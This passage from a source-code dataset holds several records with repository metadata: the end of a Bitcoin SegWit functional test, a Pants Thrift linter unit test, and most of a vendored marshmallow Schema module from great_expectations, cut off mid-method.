429 print("Verify unsigned p2sh witness txs without a redeem script are invalid") self.fail_accept(self.nodes[2], p2sh_ids[NODE_2][WIT_V0][1], False) self.fail_accept(self.nodes[2], p2sh_ids[NODE_2][WIT_V1][1], False) print("Verify unsigned p2sh witness txs with a redeem script in versionbits-settings blocks are valid before the fork") self.success_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V0][1], False, addlength(witness_script(0, self.pubkey[2]))) #block 430 self.success_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V1][1], False, addlength(witness_script(1, self.pubkey[2]))) #block 431 print("Verify previous witness txs skipped for mining can now be mined") assert_equal(len(self.nodes[2].getrawmempool()), 4) block = self.nodes[2].generate(1) #block 432 (first block with new rules; 432 = 144 * 3) sync_blocks(self.nodes) assert_equal(len(self.nodes[2].getrawmempool()), 0) assert_equal(len(self.nodes[2].getblock(block[0])["tx"]), 5) print("Verify witness txs without witness data are invalid after the fork") self.fail_mine(self.nodes[2], wit_ids[NODE_2][WIT_V0][2], False) self.fail_mine(self.nodes[2], wit_ids[NODE_2][WIT_V1][2], False) self.fail_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V0][2], False, addlength(witness_script(0, self.pubkey[2]))) self.fail_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V1][2], False, addlength(witness_script(1, self.pubkey[2]))) print("Verify default node can now use witness txs") self.success_mine(self.nodes[0], wit_ids[NODE_0][WIT_V0][0], True) #block 432 self.success_mine(self.nodes[0], wit_ids[NODE_0][WIT_V1][0], True) #block 433 self.success_mine(self.nodes[0], p2sh_ids[NODE_0][WIT_V0][0], True) #block 434 self.success_mine(self.nodes[0], p2sh_ids[NODE_0][WIT_V1][0], True) #block 435 print("Verify sigops are counted in GBT with BIP141 rules after the fork") txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 1) tmpl = self.nodes[0].getblocktemplate({'rules':['segwit']}) assert(tmpl['sigoplimit'] == 80000) assert(tmpl['transactions'][0]['txid'] == txid) assert(tmpl['transactions'][0]['sigops'] == 8) print("Verify non-segwit miners get a valid GBT response after the fork") send_to_witness(1, self.nodes[0], find_unspent(self.nodes[0], 50), self.pubkey[0], False, Decimal("49.998")) try: tmpl = self.nodes[0].getblocktemplate({}) assert(len(tmpl['transactions']) == 1) # Doesn't include witness tx assert(tmpl['sigoplimit'] == 20000) assert(tmpl['transactions'][0]['hash'] == txid) assert(tmpl['transactions'][0]['sigops'] == 2) assert(('!segwit' in tmpl['rules']) or ('segwit' not in tmpl['rules'])) except JSONRPCException: # This is an acceptable outcome pass if __name__ == '__main__': SegWitTest().main()
49.330645
198
0.654569
f7bf2016a22d95a1318cbe4626967e602079f919
2,275
py
Python
contrib/scrooge/tests/python/pants_test/contrib/scrooge/tasks/test_thrift_linter.py
AllClearID/pants
c4fdf00a3bdf9f26f876e85c46909d0729f7132c
[ "Apache-2.0" ]
null
null
null
contrib/scrooge/tests/python/pants_test/contrib/scrooge/tasks/test_thrift_linter.py
AllClearID/pants
c4fdf00a3bdf9f26f876e85c46909d0729f7132c
[ "Apache-2.0" ]
null
null
null
contrib/scrooge/tests/python/pants_test/contrib/scrooge/tasks/test_thrift_linter.py
AllClearID/pants
c4fdf00a3bdf9f26f876e85c46909d0729f7132c
[ "Apache-2.0" ]
null
null
null
# coding=utf-8 # Copyright 2014 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). from __future__ import (absolute_import, division, generators, nested_scopes, print_function, unicode_literals, with_statement) from mock import Mock, patch from pants.backend.codegen.thrift.java.java_thrift_library import JavaThriftLibrary from pants.base.workunit import WorkUnitLabel from pants.build_graph.build_file_aliases import BuildFileAliases from pants_test.task_test_base import TaskTestBase from pants.contrib.scrooge.tasks.thrift_linter import ThriftLinter class ThriftLinterTest(TaskTestBase): def _prepare_mocks(self, task): self._run_java_mock = Mock(return_value=0) task.tool_classpath = Mock(return_value='foo_classpath') task.runjava = self._run_java_mock @classmethod def alias_groups(cls): return BuildFileAliases( targets={ 'java_thrift_library': JavaThriftLibrary, }, ) @classmethod def task_type(cls): return ThriftLinter @patch('pants.contrib.scrooge.tasks.thrift_linter.calculate_compile_sources') def test_lint(self, mock_calculate_compile_sources): def get_default_jvm_options(): return self.task_type().get_jvm_options_default(self.context().options.for_global_scope()) thrift_target = self.create_library('a', 'java_thrift_library', 'a', ['A.thrift']) task = self.create_task(self.context(target_roots=thrift_target)) self._prepare_mocks(task) expected_include_paths = {'src/thrift/tweet', 'src/thrift/users'} expected_paths = {'src/thrift/tweet/a.thrift', 'src/thrift/tweet/b.thrift'} mock_calculate_compile_sources.return_value = (expected_include_paths, expected_paths) task._lint(thrift_target, task.tool_classpath('scrooge-linter')) self._run_java_mock.assert_called_once_with( classpath='foo_classpath', main='com.twitter.scrooge.linter.Main', args=['--ignore-errors', '--include-path', 'src/thrift/users', '--include-path', 'src/thrift/tweet', 'src/thrift/tweet/b.thrift', 'src/thrift/tweet/a.thrift'], jvm_options=get_default_jvm_options(), workunit_labels=[WorkUnitLabel.COMPILER, WorkUnitLabel.SUPPRESS_LABEL])
40.625
96
0.755604
76cd2c1192f153710c0ad909540da9b7976e8770
49,711
py
Python
great_expectations/marshmallow__shade/schema.py
victorcouste/great_expectations
9ee46d83feb87e13c769e2ae35b899b3f18d73a4
[ "Apache-2.0" ]
6,451
2017-09-11T16:32:53.000Z
2022-03-31T23:27:49.000Z
great_expectations/marshmallow__shade/schema.py
victorcouste/great_expectations
9ee46d83feb87e13c769e2ae35b899b3f18d73a4
[ "Apache-2.0" ]
3,892
2017-09-08T18:57:50.000Z
2022-03-31T23:15:20.000Z
great_expectations/marshmallow__shade/schema.py
victorcouste/great_expectations
9ee46d83feb87e13c769e2ae35b899b3f18d73a4
[ "Apache-2.0" ]
1,023
2017-09-08T15:22:05.000Z
2022-03-31T21:17:08.000Z
"""The :class:`Schema` class, including its metaclass and options (class Meta).""" import copy import datetime as dt import decimal import inspect import json import typing import uuid import warnings from collections import OrderedDict, defaultdict from collections.abc import Mapping from functools import lru_cache from great_expectations.marshmallow__shade import base, class_registry from great_expectations.marshmallow__shade import fields as ma_fields from great_expectations.marshmallow__shade import types from great_expectations.marshmallow__shade.decorators import ( POST_DUMP, POST_LOAD, PRE_DUMP, PRE_LOAD, VALIDATES, VALIDATES_SCHEMA, ) from great_expectations.marshmallow__shade.error_store import ErrorStore from great_expectations.marshmallow__shade.exceptions import ( StringNotCollectionError, ValidationError, ) from great_expectations.marshmallow__shade.orderedset import OrderedSet from great_expectations.marshmallow__shade.utils import ( EXCLUDE, INCLUDE, RAISE, get_value, is_collection, is_instance_or_subclass, is_iterable_but_not_string, missing, set_value, ) from great_expectations.marshmallow__shade.warnings import RemovedInMarshmallow4Warning _T = typing.TypeVar("_T") def _get_fields(attrs, field_class, pop=False, ordered=False): """Get fields from a class. If ordered=True, fields will sorted by creation index. :param attrs: Mapping of class attributes :param type field_class: Base field class :param bool pop: Remove matching fields """ fields = [ (field_name, field_value) for field_name, field_value in attrs.items() if is_instance_or_subclass(field_value, field_class) ] if pop: for field_name, _ in fields: del attrs[field_name] if ordered: fields.sort(key=lambda pair: pair[1]._creation_index) return fields # This function allows Schemas to inherit from non-Schema classes and ensures # inheritance according to the MRO def _get_fields_by_mro(klass, field_class, ordered=False): """Collect fields from a class, following its method resolution order. The class itself is excluded from the search; only its parents are checked. Get fields from ``_declared_fields`` if available, else use ``__dict__``. :param type klass: Class whose fields to retrieve :param type field_class: Base field class """ mro = inspect.getmro(klass) # Loop over mro in reverse to maintain correct order of fields return sum( ( _get_fields( getattr(base, "_declared_fields", base.__dict__), field_class, ordered=ordered, ) for base in mro[:0:-1] ), [], ) class SchemaMeta(type): """Metaclass for the Schema class. Binds the declared fields to a ``_declared_fields`` attribute, which is a dictionary mapping attribute names to field objects. Also sets the ``opts`` class attribute, which is the Schema class's ``class Meta`` options. """ def __new__(mcs, name, bases, attrs): meta = attrs.get("Meta") ordered = getattr(meta, "ordered", False) if not ordered: # Inherit 'ordered' option # Warning: We loop through bases instead of MRO because we don't # yet have access to the class object # (i.e. can't call super before we have fields) for base_ in bases: if hasattr(base_, "Meta") and hasattr(base_.Meta, "ordered"): ordered = base_.Meta.ordered break else: ordered = False cls_fields = _get_fields(attrs, base.FieldABC, pop=True, ordered=ordered) klass = super().__new__(mcs, name, bases, attrs) inherited_fields = _get_fields_by_mro(klass, base.FieldABC, ordered=ordered) meta = klass.Meta # Set klass.opts in __new__ rather than __init__ so that it is accessible in # get_declared_fields klass.opts = klass.OPTIONS_CLASS(meta, ordered=ordered) # Add fields specified in the `include` class Meta option cls_fields += list(klass.opts.include.items()) dict_cls = OrderedDict if ordered else dict # Assign _declared_fields on class klass._declared_fields = mcs.get_declared_fields( klass=klass, cls_fields=cls_fields, inherited_fields=inherited_fields, dict_cls=dict_cls, ) return klass @classmethod def get_declared_fields( mcs, klass: type, cls_fields: typing.List, inherited_fields: typing.List, dict_cls: type, ): """Returns a dictionary of field_name => `Field` pairs declared on the class. This is exposed mainly so that plugins can add additional fields, e.g. fields computed from class Meta options. :param klass: The class object. :param cls_fields: The fields declared on the class, including those added by the ``include`` class Meta option. :param inherited_fields: Inherited fields. :param dict_class: Either `dict` or `OrderedDict`, depending on the whether the user specified `ordered=True`. """ return dict_cls(inherited_fields + cls_fields) def __init__(cls, name, bases, attrs): super().__init__(name, bases, attrs) if name and cls.opts.register: class_registry.register(name, cls) cls._hooks = cls.resolve_hooks() def resolve_hooks(cls) -> typing.Dict[types.Tag, typing.List[str]]: """Add in the decorated processors By doing this after constructing the class, we let standard inheritance do all the hard work. """ mro = inspect.getmro(cls) hooks = defaultdict(list) # type: typing.Dict[types.Tag, typing.List[str]] for attr_name in dir(cls): # Need to look up the actual descriptor, not whatever might be # bound to the class. This needs to come from the __dict__ of the # declaring class. for parent in mro: try: attr = parent.__dict__[attr_name] except KeyError: continue else: break else: # In case we didn't find the attribute and didn't break above. # We should never hit this - it's just here for completeness # to exclude the possibility of attr being undefined. continue try: hook_config = attr.__marshmallow_hook__ except AttributeError: pass else: for key in hook_config.keys(): # Use name here so we can get the bound method later, in # case the processor was a descriptor or something. hooks[key].append(attr_name) return hooks class SchemaOpts: """class Meta options for the :class:`Schema`. Defines defaults.""" def __init__(self, meta, ordered: bool = False): self.fields = getattr(meta, "fields", ()) if not isinstance(self.fields, (list, tuple)): raise ValueError("`fields` option must be a list or tuple.") self.additional = getattr(meta, "additional", ()) if not isinstance(self.additional, (list, tuple)): raise ValueError("`additional` option must be a list or tuple.") if self.fields and self.additional: raise ValueError( "Cannot set both `fields` and `additional` options" " for the same Schema." ) self.exclude = getattr(meta, "exclude", ()) if not isinstance(self.exclude, (list, tuple)): raise ValueError("`exclude` must be a list or tuple.") self.dateformat = getattr(meta, "dateformat", None) self.datetimeformat = getattr(meta, "datetimeformat", None) if hasattr(meta, "json_module"): warnings.warn( "The json_module class Meta option is deprecated. Use render_module instead.", RemovedInMarshmallow4Warning, ) render_module = getattr(meta, "json_module", json) else: render_module = json self.render_module = getattr(meta, "render_module", render_module) self.ordered = getattr(meta, "ordered", ordered) self.index_errors = getattr(meta, "index_errors", True) self.include = getattr(meta, "include", {}) self.load_only = getattr(meta, "load_only", ()) self.dump_only = getattr(meta, "dump_only", ()) self.unknown = getattr(meta, "unknown", RAISE) self.register = getattr(meta, "register", True) class Schema(base.SchemaABC, metaclass=SchemaMeta): """Base schema class with which to define custom schemas. Example usage: .. code-block:: python import datetime as dt from dataclasses import dataclass from great_expectations.marshmallow__shade import Schema, fields @dataclass class Album: title: str release_date: dt.date class AlbumSchema(Schema): title = fields.Str() release_date = fields.Date() album = Album("Beggars Banquet", dt.date(1968, 12, 6)) schema = AlbumSchema() data = schema.dump(album) data # {'release_date': '1968-12-06', 'title': 'Beggars Banquet'} :param only: Whitelist of the declared fields to select when instantiating the Schema. If None, all fields are used. Nested fields can be represented with dot delimiters. :param exclude: Blacklist of the declared fields to exclude when instantiating the Schema. If a field appears in both `only` and `exclude`, it is not used. Nested fields can be represented with dot delimiters. :param many: Should be set to `True` if ``obj`` is a collection so that the object will be serialized to a list. :param context: Optional context passed to :class:`fields.Method` and :class:`fields.Function` fields. :param load_only: Fields to skip during serialization (write-only fields) :param dump_only: Fields to skip during deserialization (read-only fields) :param partial: Whether to ignore missing fields and not require any fields declared. Propagates down to ``Nested`` fields as well. If its value is an iterable, only missing fields listed in that iterable will be ignored. Use dot delimiters to specify nested fields. :param unknown: Whether to exclude, include, or raise an error for unknown fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`. .. versionchanged:: 3.0.0 `prefix` parameter removed. .. versionchanged:: 2.0.0 `__validators__`, `__preprocessors__`, and `__data_handlers__` are removed in favor of `marshmallow.decorators.validates_schema`, `marshmallow.decorators.pre_load` and `marshmallow.decorators.post_dump`. `__accessor__` and `__error_handler__` are deprecated. Implement the `handle_error` and `get_attribute` methods instead. """ TYPE_MAPPING = { str: ma_fields.String, bytes: ma_fields.String, dt.datetime: ma_fields.DateTime, float: ma_fields.Float, bool: ma_fields.Boolean, tuple: ma_fields.Raw, list: ma_fields.Raw, set: ma_fields.Raw, int: ma_fields.Integer, uuid.UUID: ma_fields.UUID, dt.time: ma_fields.Time, dt.date: ma_fields.Date, dt.timedelta: ma_fields.TimeDelta, decimal.Decimal: ma_fields.Decimal, } # type: typing.Dict[type, typing.Type[ma_fields.Field]] #: Overrides for default schema-level error messages error_messages = {} # type: typing.Dict[str, str] _default_error_messages = { "type": "Invalid input type.", "unknown": "Unknown field.", } # type: typing.Dict[str, str] OPTIONS_CLASS = SchemaOpts # type: type # These get set by SchemaMeta opts = None # type: SchemaOpts _declared_fields = {} # type: typing.Dict[str, ma_fields.Field] _hooks = {} # type: typing.Dict[types.Tag, typing.List[str]] class Meta: """Options object for a Schema. Example usage: :: class Meta: fields = ("id", "email", "date_created") exclude = ("password", "secret_attribute") Available options: - ``fields``: Tuple or list of fields to include in the serialized result. - ``additional``: Tuple or list of fields to include *in addition* to the explicitly declared fields. ``additional`` and ``fields`` are mutually-exclusive options. - ``include``: Dictionary of additional fields to include in the schema. It is usually better to define fields as class variables, but you may need to use this option, e.g., if your fields are Python keywords. May be an `OrderedDict`. - ``exclude``: Tuple or list of fields to exclude in the serialized result. Nested fields can be represented with dot delimiters. - ``dateformat``: Default format for `Date <fields.Date>` fields. - ``datetimeformat``: Default format for `DateTime <fields.DateTime>` fields. - ``render_module``: Module to use for `loads <Schema.loads>` and `dumps <Schema.dumps>`. Defaults to `json` from the standard library. - ``ordered``: If `True`, order serialization output according to the order in which fields were declared. Output of `Schema.dump` will be a `collections.OrderedDict`. - ``index_errors``: If `True`, errors dictionaries will include the index of invalid items in a collection. - ``load_only``: Tuple or list of fields to exclude from serialized results. - ``dump_only``: Tuple or list of fields to exclude from deserialization - ``unknown``: Whether to exclude, include, or raise an error for unknown fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`. - ``register``: Whether to register the `Schema` with marshmallow's internal class registry. Must be `True` if you intend to refer to this `Schema` by class name in `Nested` fields. Only set this to `False` when memory usage is critical. Defaults to `True`. """ def __init__( self, *, only: types.StrSequenceOrSet = None, exclude: types.StrSequenceOrSet = (), many: bool = False, context: typing.Dict = None, load_only: types.StrSequenceOrSet = (), dump_only: types.StrSequenceOrSet = (), partial: typing.Union[bool, types.StrSequenceOrSet] = False, unknown: str = None, ): # Raise error if only or exclude is passed as string, not list of strings if only is not None and not is_collection(only): raise StringNotCollectionError('"only" should be a list of strings') if not is_collection(exclude): raise StringNotCollectionError('"exclude" should be a list of strings') # copy declared fields from metaclass self.declared_fields = copy.deepcopy(self._declared_fields) self.many = many self.only = only self.exclude = set(self.opts.exclude) | set(exclude) self.ordered = self.opts.ordered self.load_only = set(load_only) or set(self.opts.load_only) self.dump_only = set(dump_only) or set(self.opts.dump_only) self.partial = partial self.unknown = unknown or self.opts.unknown self.context = context or {} self._normalize_nested_options() #: Dictionary mapping field_names -> :class:`Field` objects self.fields = {} # type: typing.Dict[str, ma_fields.Field] self.load_fields = {} # type: typing.Dict[str, ma_fields.Field] self.dump_fields = {} # type: typing.Dict[str, ma_fields.Field] self._init_fields() messages = {} messages.update(self._default_error_messages) for cls in reversed(self.__class__.__mro__): messages.update(getattr(cls, "error_messages", {})) messages.update(self.error_messages or {}) self.error_messages = messages def __repr__(self) -> str: return "<{ClassName}(many={self.many})>".format( ClassName=self.__class__.__name__, self=self ) @property def dict_class(self) -> type: return OrderedDict if self.ordered else dict @property def set_class(self) -> type: return OrderedSet if self.ordered else set @classmethod def from_dict( cls, fields: typing.Dict[str, typing.Union[ma_fields.Field, type]], *, name: str = "GeneratedSchema", ) -> type: """Generate a `Schema` class given a dictionary of fields. .. code-block:: python from great_expectations.marshmallow__shade import Schema, fields PersonSchema = Schema.from_dict({"name": fields.Str()}) print(PersonSchema().load({"name": "David"})) # => {'name': 'David'} Generated schemas are not added to the class registry and therefore cannot be referred to by name in `Nested` fields. :param dict fields: Dictionary mapping field names to field instances. :param str name: Optional name for the class, which will appear in the ``repr`` for the class. .. versionadded:: 3.0.0 """ attrs = fields.copy() attrs["Meta"] = type( "GeneratedMeta", (getattr(cls, "Meta", object),), {"register": False} ) schema_cls = type(name, (cls,), attrs) return schema_cls ##### Override-able methods ##### def handle_error( self, error: ValidationError, data: typing.Any, *, many: bool, **kwargs ): """Custom error handler function for the schema. :param error: The `ValidationError` raised during (de)serialization. :param data: The original input data. :param many: Value of ``many`` on dump or load. :param partial: Value of ``partial`` on load. .. versionadded:: 2.0.0 .. versionchanged:: 3.0.0rc9 Receives `many` and `partial` (on deserialization) as keyword arguments. """ pass def get_attribute(self, obj: typing.Any, attr: str, default: typing.Any): """Defines how to pull values from an object to serialize. .. versionadded:: 2.0.0 .. versionchanged:: 3.0.0a1 Changed position of ``obj`` and ``attr``. """ return get_value(obj, attr, default) ##### Serialization/Deserialization API ##### @staticmethod def _call_and_store(getter_func, data, *, field_name, error_store, index=None): """Call ``getter_func`` with ``data`` as its argument, and store any `ValidationErrors`. :param callable getter_func: Function for getting the serialized/deserialized value from ``data``. :param data: The data passed to ``getter_func``. :param str field_name: Field name. :param int index: Index of the item being validated, if validating a collection, otherwise `None`. """ try: value = getter_func(data) except ValidationError as error: error_store.store_error(error.messages, field_name, index=index) # When a Nested field fails validation, the marshalled data is stored # on the ValidationError's valid_data attribute return error.valid_data or missing return value def _serialize( self, obj: typing.Union[_T, typing.Iterable[_T]], *, many: bool = False ): """Serialize ``obj``. :param obj: The object(s) to serialize. :param bool many: `True` if ``data`` should be serialized as a collection. :return: A dictionary of the serialized data .. versionchanged:: 1.0.0 Renamed from ``marshal``. """ if many and obj is not None: return [ self._serialize(d, many=False) for d in typing.cast(typing.Iterable[_T], obj) ] ret = self.dict_class() for attr_name, field_obj in self.dump_fields.items(): value = field_obj.serialize(attr_name, obj, accessor=self.get_attribute) if value is missing: continue key = field_obj.data_key if field_obj.data_key is not None else attr_name ret[key] = value return ret def dump(self, obj: typing.Any, *, many: bool = None): """Serialize an object to native Python data types according to this Schema's fields. :param obj: The object to serialize. :param many: Whether to serialize `obj` as a collection. If `None`, the value for `self.many` is used. :return: A dict of serialized data :rtype: dict .. versionadded:: 1.0.0 .. versionchanged:: 3.0.0b7 This method returns the serialized data rather than a ``(data, errors)`` duple. A :exc:`ValidationError <marshmallow.exceptions.ValidationError>` is raised if ``obj`` is invalid. .. versionchanged:: 3.0.0rc9 Validation no longer occurs upon serialization. """ many = self.many if many is None else bool(many) if many and is_iterable_but_not_string(obj): obj = list(obj) if self._has_processors(PRE_DUMP): processed_obj = self._invoke_dump_processors( PRE_DUMP, obj, many=many, original_data=obj ) else: processed_obj = obj result = self._serialize(processed_obj, many=many) if self._has_processors(POST_DUMP): result = self._invoke_dump_processors( POST_DUMP, result, many=many, original_data=obj ) return result def dumps(self, obj: typing.Any, *args, many: bool = None, **kwargs): """Same as :meth:`dump`, except return a JSON-encoded string. :param obj: The object to serialize. :param many: Whether to serialize `obj` as a collection. If `None`, the value for `self.many` is used. :return: A ``json`` string :rtype: str .. versionadded:: 1.0.0 .. versionchanged:: 3.0.0b7 This method returns the serialized data rather than a ``(data, errors)`` duple. A :exc:`ValidationError <marshmallow.exceptions.ValidationError>` is raised if ``obj`` is invalid. """ serialized = self.dump(obj, many=many) def datetime_serializer(o): if isinstance(o, dt.datetime): return o.__str__() if "default" not in kwargs: kwargs.update({"default": datetime_serializer}) return self.opts.render_module.dumps(serialized, *args, **kwargs) def _deserialize( self, data: typing.Union[ typing.Mapping[str, typing.Any], typing.Iterable[typing.Mapping[str, typing.Any]], ], *, error_store: ErrorStore, many: bool = False, partial=False, unknown=RAISE, index=None, ) -> typing.Union[_T, typing.List[_T]]: """Deserialize ``data``. :param dict data: The data to deserialize. :param ErrorStore error_store: Structure to store errors. :param bool many: `True` if ``data`` should be deserialized as a collection. :param bool|tuple partial: Whether to ignore missing fields and not require any fields declared. Propagates down to ``Nested`` fields as well. If its value is an iterable, only missing fields listed in that iterable will be ignored. Use dot delimiters to specify nested fields. :param unknown: Whether to exclude, include, or raise an error for unknown fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`. :param int index: Index of the item being serialized (for storing errors) if serializing a collection, otherwise `None`. :return: A dictionary of the deserialized data. """ index_errors = self.opts.index_errors index = index if index_errors else None if many: if not is_collection(data): error_store.store_error([self.error_messages["type"]], index=index) ret = [] # type: typing.List[_T] else: ret = [ typing.cast( _T, self._deserialize( typing.cast(typing.Mapping[str, typing.Any], d), error_store=error_store, many=False, partial=partial, unknown=unknown, index=idx, ), ) for idx, d in enumerate(data) ] return ret ret = self.dict_class() # Check data is a dict if not isinstance(data, Mapping): error_store.store_error([self.error_messages["type"]], index=index) else: partial_is_collection = is_collection(partial) for attr_name, field_obj in self.load_fields.items(): field_name = ( field_obj.data_key if field_obj.data_key is not None else attr_name ) raw_value = data.get(field_name, missing) if raw_value is missing: # Ignore missing field if we're allowed to. if partial is True or ( partial_is_collection and attr_name in partial ): continue d_kwargs = {} # Allow partial loading of nested schemas. if partial_is_collection: prefix = field_name + "." len_prefix = len(prefix) sub_partial = [ f[len_prefix:] for f in partial if f.startswith(prefix) ] d_kwargs["partial"] = sub_partial else: d_kwargs["partial"] = partial getter = lambda val: field_obj.deserialize( val, field_name, data, **d_kwargs ) value = self._call_and_store( getter_func=getter, data=raw_value, field_name=field_name, error_store=error_store, index=index, ) if value is not missing: key = field_obj.attribute or attr_name set_value(typing.cast(typing.Dict, ret), key, value) if unknown != EXCLUDE: fields = { field_obj.data_key if field_obj.data_key is not None else field_name for field_name, field_obj in self.load_fields.items() } for key in set(data) - fields: value = data[key] if unknown == INCLUDE: set_value(typing.cast(typing.Dict, ret), key, value) elif unknown == RAISE: error_store.store_error( [self.error_messages["unknown"]], key, (index if index_errors else None), ) return ret def load( self, data: typing.Union[ typing.Mapping[str, typing.Any], typing.Iterable[typing.Mapping[str, typing.Any]], ], *, many: bool = None, partial: typing.Union[bool, types.StrSequenceOrSet] = None, unknown: str = None, ): """Deserialize a data structure to an object defined by this Schema's fields. :param data: The data to deserialize. :param many: Whether to deserialize `data` as a collection. If `None`, the value for `self.many` is used. :param partial: Whether to ignore missing fields and not require any fields declared. Propagates down to ``Nested`` fields as well. If its value is an iterable, only missing fields listed in that iterable will be ignored. Use dot delimiters to specify nested fields. :param unknown: Whether to exclude, include, or raise an error for unknown fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`. If `None`, the value for `self.unknown` is used. :return: Deserialized data .. versionadded:: 1.0.0 .. versionchanged:: 3.0.0b7 This method returns the deserialized data rather than a ``(data, errors)`` duple. A :exc:`ValidationError <marshmallow.exceptions.ValidationError>` is raised if invalid data are passed. """ return self._do_load( data, many=many, partial=partial, unknown=unknown, postprocess=True ) def loads( self, json_data: str, *, many: bool = None, partial: typing.Union[bool, types.StrSequenceOrSet] = None, unknown: str = None, **kwargs, ): """Same as :meth:`load`, except it takes a JSON string as input. :param json_data: A JSON string of the data to deserialize. :param many: Whether to deserialize `obj` as a collection. If `None`, the value for `self.many` is used. :param partial: Whether to ignore missing fields and not require any fields declared. Propagates down to ``Nested`` fields as well. If its value is an iterable, only missing fields listed in that iterable will be ignored. Use dot delimiters to specify nested fields. :param unknown: Whether to exclude, include, or raise an error for unknown fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`. If `None`, the value for `self.unknown` is used. :return: Deserialized data .. versionadded:: 1.0.0 .. versionchanged:: 3.0.0b7 This method returns the deserialized data rather than a ``(data, errors)`` duple. A :exc:`ValidationError <marshmallow.exceptions.ValidationError>` is raised if invalid data are passed. """ data = self.opts.render_module.loads(json_data, **kwargs) return self.load(data, many=many, partial=partial, unknown=unknown) def _run_validator( self, validator_func, output, *, original_data, error_store, many, partial, pass_original, index=None, ): try: if pass_original: # Pass original, raw data (before unmarshalling) validator_func(output, original_data, partial=partial, many=many) else: validator_func(output, partial=partial, many=many) except ValidationError as err: error_store.store_error(err.messages, err.field_name, index=index) def validate( self, data: typing.Mapping, *, many: bool = None, partial: typing.Union[bool, types.StrSequenceOrSet] = None, ) -> typing.Dict[str, typing.List[str]]: """Validate `data` against the schema, returning a dictionary of validation errors. :param data: The data to validate. :param many: Whether to validate `data` as a collection. If `None`, the value for `self.many` is used. :param partial: Whether to ignore missing fields and not require any fields declared. Propagates down to ``Nested`` fields as well. If its value is an iterable, only missing fields listed in that iterable will be ignored. Use dot delimiters to specify nested fields. :return: A dictionary of validation errors. .. versionadded:: 1.1.0 """ try: self._do_load(data, many=many, partial=partial, postprocess=False) except ValidationError as exc: return typing.cast(typing.Dict[str, typing.List[str]], exc.messages) return {} ##### Private Helpers ##### def _do_load( self, data: typing.Union[ typing.Mapping[str, typing.Any], typing.Iterable[typing.Mapping[str, typing.Any]], ], *, many: bool = None, partial: typing.Union[bool, types.StrSequenceOrSet] = None, unknown: str = None, postprocess: bool = True, ): """Deserialize `data`, returning the deserialized result. This method is private API. :param data: The data to deserialize. :param many: Whether to deserialize `data` as a collection. If `None`, the value for `self.many` is used. :param partial: Whether to validate required fields. If its value is an iterable, only fields listed in that iterable will be ignored will be allowed missing. If `True`, all fields will be allowed missing. If `None`, the value for `self.partial` is used. :param unknown: Whether to exclude, include, or raise an error for unknown fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`. If `None`, the value for `self.unknown` is used. :param postprocess: Whether to run post_load methods.. :return: Deserialized data """ error_store = ErrorStore() errors = {} # type: typing.Dict[str, typing.List[str]] many = self.many if many is None else bool(many) unknown = unknown or self.unknown if partial is None: partial = self.partial # Run preprocessors if self._has_processors(PRE_LOAD): try: processed_data = self._invoke_load_processors( PRE_LOAD, data, many=many, original_data=data, partial=partial ) except ValidationError as err: errors = err.normalized_messages() result = ( None ) # type: typing.Optional[typing.Union[typing.List, typing.Dict]] else: processed_data = data if not errors: # Deserialize data result = self._deserialize( processed_data, error_store=error_store, many=many, partial=partial, unknown=unknown, ) # Run field-level validation self._invoke_field_validators( error_store=error_store, data=result, many=many ) # Run schema-level validation if self._has_processors(VALIDATES_SCHEMA): field_errors = bool(error_store.errors) self._invoke_schema_validators( error_store=error_store, pass_many=True, data=result, original_data=data, many=many, partial=partial, field_errors=field_errors, ) self._invoke_schema_validators( error_store=error_store, pass_many=False, data=result, original_data=data, many=many, partial=partial, field_errors=field_errors, ) errors = error_store.errors # Run post processors if not errors and postprocess and self._has_processors(POST_LOAD): try: result = self._invoke_load_processors( POST_LOAD, result, many=many, original_data=data, partial=partial, ) except ValidationError as err: errors = err.normalized_messages() if errors: exc = ValidationError(errors, data=data, valid_data=result) self.handle_error(exc, data, many=many, partial=partial) raise exc return result def _normalize_nested_options(self) -> None: """Apply then flatten nested schema options. This method is private API. """ if self.only is not None: # Apply the only option to nested fields. self.__apply_nested_option("only", self.only, "intersection") # Remove the child field names from the only option. self.only = self.set_class([field.split(".", 1)[0] for field in self.only]) if self.exclude: # Apply the exclude option to nested fields. self.__apply_nested_option("exclude", self.exclude, "union") # Remove the parent field names from the exclude option. self.exclude = self.set_class( [field for field in self.exclude if "." not in field] ) def __apply_nested_option(self, option_name, field_names, set_operation) -> None: """Apply nested options to nested fields""" # Split nested field names on the first dot. nested_fields = [name.split(".", 1) for name in field_names if "." in name] # Partition the nested field names by parent field. nested_options = defaultdict(list) # type: defaultdict for parent, nested_names in nested_fields: nested_options[parent].append(nested_names) # Apply the nested field options. for key, options in iter(nested_options.items()): new_options = self.set_class(options) original_options = getattr(self.declared_fields[key], option_name, ()) if original_options: if set_operation == "union": new_options |= self.set_class(original_options) if set_operation == "intersection": new_options &= self.set_class(original_options) setattr(self.declared_fields[key], option_name, new_options) def _init_fields(self) -> None: """Update self.fields, self.load_fields, and self.dump_fields based on schema options. This method is private API. """ if self.opts.fields: available_field_names = self.set_class(self.opts.fields) else: available_field_names = self.set_class(self.declared_fields.keys()) if self.opts.additional: available_field_names |= self.set_class(self.opts.additional) invalid_fields = self.set_class() if self.only is not None: # Return only fields specified in only option field_names = self.set_class(self.only) invalid_fields |= field_names - available_field_names else: field_names = available_field_names # If "exclude" option or param is specified, remove those fields. if self.exclude: # Note that this isn't available_field_names, since we want to # apply "only" for the actual calculation. field_names = field_names - self.exclude invalid_fields |= self.exclude - available_field_names if invalid_fields: message = f"Invalid fields for {self}: {invalid_fields}." raise ValueError(message) fields_dict = self.dict_class() for field_name in field_names: field_obj = self.declared_fields.get(field_name, ma_fields.Inferred()) self._bind_field(field_name, field_obj) fields_dict[field_name] = field_obj load_fields, dump_fields = self.dict_class(), self.dict_class() for field_name, field_obj in fields_dict.items(): if not field_obj.dump_only: 